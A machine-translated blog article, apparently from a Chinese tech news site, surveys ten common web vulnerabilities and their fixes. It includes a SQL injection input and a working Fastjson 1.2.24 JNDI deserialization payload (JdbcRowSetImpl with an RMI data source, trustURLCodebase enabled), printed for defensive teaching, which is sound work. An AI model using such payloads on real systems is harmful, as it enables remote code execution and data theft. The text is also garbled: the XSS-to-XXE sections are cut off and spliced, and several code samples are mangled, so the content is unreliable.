Shulou(Shulou.com)06/03 Report--

In this issue, the editor will bring you about the ten common security vulnerabilities in web development. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

In our daily development, many partners tend to ignore the problem of security vulnerabilities and think that as long as the business logic is implemented normally. In fact, security is the most important thing.

I. SQL injection

1.1 what is SQL injection?

SQL injection is a kind of code injection technology, which is generally used to attack web applications. It deceives the application server and executes malicious SQL commands by passing some special parameter characters into the web application interface to achieve the purpose of illegally obtaining system information. At present, it is one of the most common means for hackers to attack the database.

1.2 how does SQL injection attack?

Take a common business scenario: enter the employee's name in the web form search box, and then the background queries the employee with the corresponding name.

In this scenario, the front-end page usually passes a name parameter name to the background, and then the background queries the results through SQL

Name= "Tian snail"; / / SQL= "select * from staff where name=" + name; / / query database employee table staff according to the name parameters passed from the frontend.

Because SQL is directly concatenated, if we fully trust the parameters passed at the front end. If the front end passes such a parameter, the'or'1 parameter will become obscure SQL.

Select * from staff where name='' or'1s

This SQL will check out all the employee information, and the request user has exceeded its authority. The requestor can get information about all employees, and other user information has been exposed.

1.3 how to prevent SQL injection problems

1.3.1 use # {} instead of ${}

In MyBatis, using # {} instead of ${} can greatly prevent sql injection.

Because # {} is a parameter placeholder, "" is automatically added for string types, but not for other types. Because Mybatis is precompiled, subsequent parameters are no longer compiled by SQL, so SQL injection is prevented to some extent.

${} is a simple string replacement. Whatever the string is, it will be parsed into something. There is a risk of SQL injection.

1.3.2 do not expose unnecessary logs or security information, such as avoiding direct response to some sql exception information.

If an exception occurs in SQL, do not expose the information to the user. You can customize the exception to respond.

1.3.3 do not believe any external input parameters, filter some database keywords contained in the parameters

You can add a parameter check filtering method to filter database keywords such as union,or.

1.3.4 appropriate access control

When you query information, first check whether the current user has this permission. For example, when implementing the code, you can allow the user to pass an enterprise Id or other information, or get the session information of the current user. Before querying, check whether the current user belongs to this enterprise, and so on. If so, you can query the employee.

2. JSON deserialization vulnerabilities, such as Fastjson security vulnerabilities

2.1What is JSON serialization, JSON send serialization

Serialization: the process of converting an object into a sequence of bytes

Reverse sequence: the process of restoring a byte sequence to a Java object

Json serialization is to convert an object into a string in Json format, and JSON deserialization is to convert a Json string into an object.

2.2 how are JSON deserialization vulnerabilities exploited?

Insecure deserialization can lead to remote code execution, replay attacks, injection attacks, or privilege escalation attacks. Security vulnerabilities have been frequently exposed in Fastjson before. Let's analyze a deserialization vulnerability in fastjson version 1.2.24. A common way to exploit this vulnerability is to implement RCE through jndi injection.

Let's start with a simple example of fastjson deserialization:

Public class User {private String name; private int age; public String getName () {return name;} public void setName (String name) {System.out.println ("name method called"); this.name = name;} public int getAge () {return age;} public void setAge (int age) {System.out.println ("age method called") This.age = age;} public static void main (String [] args) {String str = "{\" @ type\ ":\" cn.eovie.bean.User\ ",\" age\ ": 26,\" name\ ":\" Little boy picking up snails\ "; User user = JSON.parseObject (str,User.class);}}

Running result:

The age method was called and the name method was called.

With the @ type attribute added, the setXXX method of the corresponding object can be called, while @ type means that the specified deserialization is turned into a class. If we can find a class in which one of the setXXX methods can complete the command execution through our careful construction, the purpose of the attack can be achieved.

Com.sun.rowset.JdbcRowSetImpl is such a class. It has two set methods, setAutoCommit and setDataSourceName.

If you are interested, you can take a look at its source code.

Public void setDataSourceName (String var1) throws SQLException {if (this.getDataSourceName ()! = null) {if (! this.getDataSourceName (). Equals (var1)) {super.setDataSourceName (var1); this.conn = null; this.ps = null; this.rs = null }} else {super.setDataSourceName (var1);}} public void setAutoCommit (boolean var1) throws SQLException {if (this.conn! = null) {this.conn.setAutoCommit (var1);} else {this.conn = this.connect (); this.conn.setAutoCommit (var1) }} private Connection connect () throws SQLException {if (this.conn! = null) {return this.conn;} else if (this.getDataSourceName ()! = null) {try {InitialContext var1 = new InitialContext (); DataSource var2 = (DataSource) var1.lookup (this.getDataSourceName ()) Return this.getUsername ()! = null & &! this.getUsername (). Equals (")? Var2.getConnection (this.getUsername (), this.getPassword ()): var2.getConnection ();} catch (NamingException var3) {throw new SQLException (this.resBundle.handleGetObject ("jdbcrowsetimpl.connect"). ToString ());}} else {return this.getUrl ()! = null? DriverManager.getConnection (this.getUrl (), this.getUsername (), this.getPassword ()): null;}}

SetDataSourceName simply sets the value of dataSourceName, there is a connect operation in setAutoCommit, and there is a typical jndi lookup method call in the connect method, and the parameter happens to be the dataSourceName set in setDataSourceName.

Therefore, the vulnerable anti-sequence code implementation is as follows:

Public class FastjsonTest {public static void main (String [] argv) {testJdbcRowSetImpl ();} public static void testJdbcRowSetImpl () {/ / JDK 8u121 later versions need to set the system variable System.setProperty ("com.sun.jndi.rmi.object.trustURLCodebase", "true") / / RMI String payload2 = "{\" @ type\ ":\" com.sun.rowset.JdbcRowSetImpl\ ",\" dataSourceName\ ":\" rmi://localhost:1099/Exploit\ "," + "\" autoCommit\ ": true}"; JSONObject.parseObject (payload2);}}

The process of reproducing vulnerabilities is as follows:

Reference code source here ha, fastjson vulnerability code test (https://github.com/earayu/fastjson_jndi_poc)

How to solve the problem of json deserialization vulnerability

You can upgrade versions, such as later versions of fastjson, enhance the security fastjson when AutoType is opened, add AutoType blacklist, and so on, in order to deal with these security vulnerabilities.

Deserialization has fastjson, gson, jackson, and so on types, which can be replaced by other types.

Upgrade + Open safemode

III. XSS attack

3.1What is XSS?

The full name of XSS attack is cross-site scripting attack (Cross-Site Scripting), which can be confused with the abbreviation of cascading style sheet (Cascading Style Sheets, CSS), so some people abbreviate cross-site scripting attack as XSS. It means that a malicious attacker inserts malicious html code into a Web page. When a user browses the page, the html code embedded in the Web will be executed, thus achieving the special purpose of malicious attack on the user. There are generally three types of XSS attacks: storage type, reflection type and Dom type XSS

3.2 how does XSS attack?

Take the reflective type as an example, the flow chart is as follows:

Let's do some simple code samples. First, the normal html page is as follows:

& xxe

Scenario 2. The attacker probes the private network of the server by changing the above entity line to the following content

] >

Scene 3. An attacker performs a denial of service attack through a malicious file

] >

7.3.How to defend against XXE

Use the method provided by the development language to disable external entities

Filter XML data submitted by users, filter

VIII. DDoS attack

8.1 what is a DDos attack

DDoS attack, the English full name is Distributed Denial of Service, Google translates to "distributed denial of service". Generally speaking, it means that the attacker initiates a large number of requests to the target website in a short time, which consumes the host resources of the target website on a large scale and makes it unable to serve normally. Online games, Internet finance and other fields are the industries with high incidence of DDoS attacks.

For ease of understanding, I would like to quote a very classic example of Zhihu.

I opened a Chongqing hot pot restaurant with 50 seats. Because of the high quality materials, the young and the old were not bullied. Usually the house is busy and the business is booming, but no one is interested in the hot pot restaurant of the two dogs on the other side. In order to deal with me, the second dog thought of a way and called 50 people to sit in my hot pot restaurant but did not order, so that other guests could not eat.

8.2 how to deal with DDoS attacks?

High-defense servers, that is, servers that can independently and hard defend against 50Gbps or above, can help websites with denial of service attacks, regularly scan network master nodes, etc.

Black list

DDoS cleaning

CDN acceleration

IX. Framework or application vulnerabilities

Struts framework vulnerabilities: remote command execution vulnerability and open redirection vulnerability

QQ Browser 9.6:API access control problems lead to disclosure of privacy mode

Oracle GlassFish Server:REST CSRF

WebLogic: unauthorized command execution vulnerability

Hacking Docker:Registry API does not authorize access

WordPress 4.7 / 4.7.1:REST API content injection vulnerability

Weak password, certificate validity verification, internal interface exposure in the public network, unauthenticated and other rights-related vulnerabilities

10.1 weak password

Empty password

Password length is less than 8

Password should not be a consecutive character (QQQQQQ)

The account password is the same (for example: root:root)

The password is opposite to the account (example: root:toor)

Password pure number (example: 112312324234, telephone number)

Password is pure letter (example: asdjfhask)

Passwords have been replaced by letters with numbers (e.g. hello word, hell0 w0rd)

Continuous combination of passwords (for example: 123456 recordabcdefmem654321 meme fedcba)

Default factory password for service / device

10.2 Certificate validity verification vulnerability

If you do not verify the validity of the certificate, then https is like a fake.

If the certificate is generated by the customer, you need to form a trust chain with the trusted root CA of the system. You cannot choose to trust all certificates in the client in the client code in order to solve the problem of ssl certificate error.

When the certificate is about to expire, it needs to be replaced in advance.

10.3 vulnerabilities related to permissions such as unauthenticated rights

For some important APIs, authentication is generally recommended. For example, if you inquire about the transfer records of an account, you must first check whether the account is owned by the operator.

These are the ten common security vulnerabilities in web development shared by Xiaobian. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.